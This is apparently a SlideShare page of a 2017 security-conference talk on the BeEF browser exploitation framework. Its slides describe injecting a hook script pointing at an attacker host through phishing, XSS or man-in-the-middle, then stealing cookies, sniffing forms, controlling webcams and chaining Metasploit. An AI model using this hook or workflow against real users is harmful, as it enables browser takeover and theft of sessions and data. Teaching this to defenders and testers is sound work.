SlideShare a Scribd company logo

Advanced Client Side Exploitation Using BeEF

Download as PPTX, PDF
1
1N3

The document provides an overview of the Browser Exploitation Framework (BeEF). It discusses how BeEF allows an attacker to control victims' browsers remotely by injecting a small JavaScript hook. This can enable the attacker to profile the victim's system, steal session cookies, redirect the browser, and run exploits or malware payloads. The document outlines how BeEF is installed and used, describes common attack vectors for injecting the hook like phishing and XSS, and demonstrates fingerprinting and attacking capabilities through its web interface modules.

Technology
Related topics:
Social Engineering
1 of 39
Downloaded 112 times
1
2
Most read
3
4
5
6
Most read
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Most read
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Man In The Browser Advanced Client-Side Exploitation with BeEF 1N3 | @CrowdShield | https://crowdshield.com ISSA Phoenix Chapter, 04/11/2017
Introduction • Sr. Penetration Tester at Early Warning • 16+ years of IT experience with a heavy focus on IT Security • Symantec/NYS Cyber Security Agency, nCircle/Tripwire, General Electric • Degree in Computer Science • OSCP, ASFP, CISSP, PCI-ASV, Security+, Network+, A+, MCP, CNA • Bug Bounty Researcher on BugCrowd and HackerOne • Founder of CrowdShield (@CrowdShield) https://crowdshield.com
Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
Logging In…
Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
XHR Polling
Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
Social Engineering Toolkit • Customized payload generation • Website Cloning • Email Template Generation • Mass Email Capabilities
Phishing & Social Engineering It only takes one wrong click…
Open Redirect
XSS Hooking BeeF hook.js injected via URL
URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
• Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
BeEF Modules
BeEF Basics
Browser Hacking Methodology • Gaining control • Fingerprinting • Retain control • Bypassing SOP • Attacking users • Attacking extensions • Attacking web applications • Attacking browsers • Attacking plugins • Attacking networks
Fingerprinting REQ-PEN-1234
Advanced Client Side Exploitation Using BeEF
Retain Control
Attacking Users Session Hijacking
Form Sniffing
Webcam Control
Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
CSRF Exploits
Tunneling Proxy
Internal Network Mapping
Integration • Execute Metasploit exploits directly through BeeF’s web UI… • Get Metasploit DB user/pass: msfconsole -x ‘load msgrpc;’ • Update Config with MSF DB user/pass: /usr/share/beef-xss/extensions/metasploit/config.yml • Enable the Metasploit module in BeeF config: /usr/share/beef-xss/config.yml
Exploits…
Exploiting Browsers Using Java
Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
Demo
Recommended Reading
Questions?

More Related Content

PDF
Client-Side Penetration Testing Presentation
Chris Gates
 
PPTX
Malware- Types, Detection and Future
karanwayne
 
PPTX
Spyware and rootkit
Nikhil Pandit
 
PDF
The Same-Origin Policy
Fabrizio Farinacci
 
PDF
Cross site scripting attacks and defenses
Mohammed A. Imran
 
PPTX
Brute force-attack presentation
Mahmoud Ibra
 
PPTX
Cross-Site Scripting (XSS)
Daniel Tumser
 
PPT
Web Hacking
Information Technology
 
Client-Side Penetration Testing Presentation
Chris Gates
 
Malware- Types, Detection and Future
karanwayne
 
Spyware and rootkit
Nikhil Pandit
 
The Same-Origin Policy
Fabrizio Farinacci
 
Cross site scripting attacks and defenses
Mohammed A. Imran
 
Brute force-attack presentation
Mahmoud Ibra
 
Cross-Site Scripting (XSS)
Daniel Tumser
 
Web Hacking
Information Technology
 

What's hot (20)

PPTX
Cross Site Scripting ( XSS)
Amit Tyagi
 
PPTX
Introduction to cyber security
Self-employed
 
PPTX
Virus
Sapna Gupta
 
PPTX
Burp Suite Starter
Fadi Abdulwahab
 
PDF
Burp suite
Yashar Shahinzadeh
 
PPT
Introduction To OWASP
Marco Morana
 
PPTX
List of Malwares
Vishalya Dulam
 
PPTX
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
PPTX
cyber security
NiharikaVoleti
 
PPTX
Buffer overflow explained
Teja Babu
 
PPTX
Ransomware attack
Amna
 
PPT
Malware
Tuhin_Das
 
PPTX
Types of cyber attacks
krishh sivakrishna
 
PDF
Addressing the cyber kill chain
Symantec Brasil
 
PPTX
Reconnaissance
n|u - The Open Security Community
 
PDF
Network Security Presentation
Allan Pratt MBA
 
PPTX
Cross site scripting
kinish kumar
 
PPTX
DDoS - Distributed Denial of Service
Er. Shiva K. Shrestha
 
PPTX
Phishing
SaurabhKantSahu1
 
PPTX
Cyber Security(Password Cracking Presentation).pptx
VASUOFFICIAL
 
Cross Site Scripting ( XSS)
Amit Tyagi
 
Introduction to cyber security
Self-employed
 
Virus
Sapna Gupta
 
Burp Suite Starter
Fadi Abdulwahab
 
Burp suite
Yashar Shahinzadeh
 
Introduction To OWASP
Marco Morana
 
List of Malwares
Vishalya Dulam
 
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
cyber security
NiharikaVoleti
 
Buffer overflow explained
Teja Babu
 
Ransomware attack
Amna
 
Malware
Tuhin_Das
 
Types of cyber attacks
krishh sivakrishna
 
Addressing the cyber kill chain
Symantec Brasil
 
Reconnaissance
n|u - The Open Security Community
 
Network Security Presentation
Allan Pratt MBA
 
Cross site scripting
kinish kumar
 
DDoS - Distributed Denial of Service
Er. Shiva K. Shrestha
 
Phishing
SaurabhKantSahu1
 
Cyber Security(Password Cracking Presentation).pptx
VASUOFFICIAL
 
Ad

Similar to Advanced Client Side Exploitation Using BeEF (20)

PPTX
Beef saurabh
Saurav Chaudhary
 
PDF
Secure Form Processing and Protection - Sunshine PHP 2015
Joe Ferguson
 
PPTX
WEB APPLICATION SECURITY
yashwanthlavu
 
PPTX
Web application security
Jin Castor
 
PPTX
Browser Security 101
Stormpath
 
PPTX
Lesson 6 web based attacks
Frank Victory
 
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
PPTX
Owasp web application security trends
beched
 
PPTX
[2.1] Web application Security Trends - Omar Ganiev
OWASP Russia
 
PPTX
WEB APPLICATION SECURITY
yashwanthlavu
 
PDF
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
PPTX
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
PPT
Internet Security
Mitesh Gupta
 
KEY
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
PPTX
webapplicationattacks-101005070110-phpapp02.pptx
SyedAliShahid3
 
PDF
Secure Coding BSSN Semarang Material.pdf
nanangAris1
 
PPTX
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Nilesh Sapariya
 
PDF
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Sam Bowne
 
PDF
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
 
PPTX
Play,Learn and Hack- CTF Training
Heba Hamdy Farahat
 
Beef saurabh
Saurav Chaudhary
 
Secure Form Processing and Protection - Sunshine PHP 2015
Joe Ferguson
 
WEB APPLICATION SECURITY
yashwanthlavu
 
Web application security
Jin Castor
 
Browser Security 101
Stormpath
 
Lesson 6 web based attacks
Frank Victory
 
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Owasp web application security trends
beched
 
[2.1] Web application Security Trends - Omar Ganiev
OWASP Russia
 
WEB APPLICATION SECURITY
yashwanthlavu
 
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
Internet Security
Mitesh Gupta
 
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
webapplicationattacks-101005070110-phpapp02.pptx
SyedAliShahid3
 
Secure Coding BSSN Semarang Material.pdf
nanangAris1
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Nilesh Sapariya
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Sam Bowne
 
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
 
Play,Learn and Hack- CTF Training
Heba Hamdy Farahat
 
Ad

Recently uploaded (20)

PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Teaching material agriculture food technology
LiaRayya
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 

Advanced Client Side Exploitation Using BeEF

  • 1. Man In The Browser Advanced Client-Side Exploitation with BeEF 1N3 | @CrowdShield | https://crowdshield.com ISSA Phoenix Chapter, 04/11/2017
  • 2. Introduction • Sr. Penetration Tester at Early Warning • 16+ years of IT experience with a heavy focus on IT Security • Symantec/NYS Cyber Security Agency, nCircle/Tripwire, General Electric • Degree in Computer Science • OSCP, ASFP, CISSP, PCI-ASV, Security+, Network+, A+, MCP, CNA • Bug Bounty Researcher on BugCrowd and HackerOne • Founder of CrowdShield (@CrowdShield) https://crowdshield.com
  • 3. Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
  • 4. What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
  • 5. Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
  • 7. Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
  • 9. Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
  • 10. Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
  • 11. Social Engineering Toolkit • Customized payload generation • Website Cloning • Email Template Generation • Mass Email Capabilities
  • 12. Phishing & Social Engineering It only takes one wrong click…
  • 14. XSS Hooking BeeF hook.js injected via URL
  • 15. URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
  • 16. Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
  • 17. Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
  • 18. Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
  • 19. • Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
  • 22. Browser Hacking Methodology • Gaining control • Fingerprinting • Retain control • Bypassing SOP • Attacking users • Attacking extensions • Attacking web applications • Attacking browsers • Attacking plugins • Attacking networks
  • 29. Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
  • 33. Integration • Execute Metasploit exploits directly through BeeF’s web UI… • Get Metasploit DB user/pass: msfconsole -x ‘load msgrpc;’ • Update Config with MSF DB user/pass: /usr/share/beef-xss/extensions/metasploit/config.yml • Enable the Metasploit module in BeeF config: /usr/share/beef-xss/config.yml
  • 36. Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
  • 37. Demo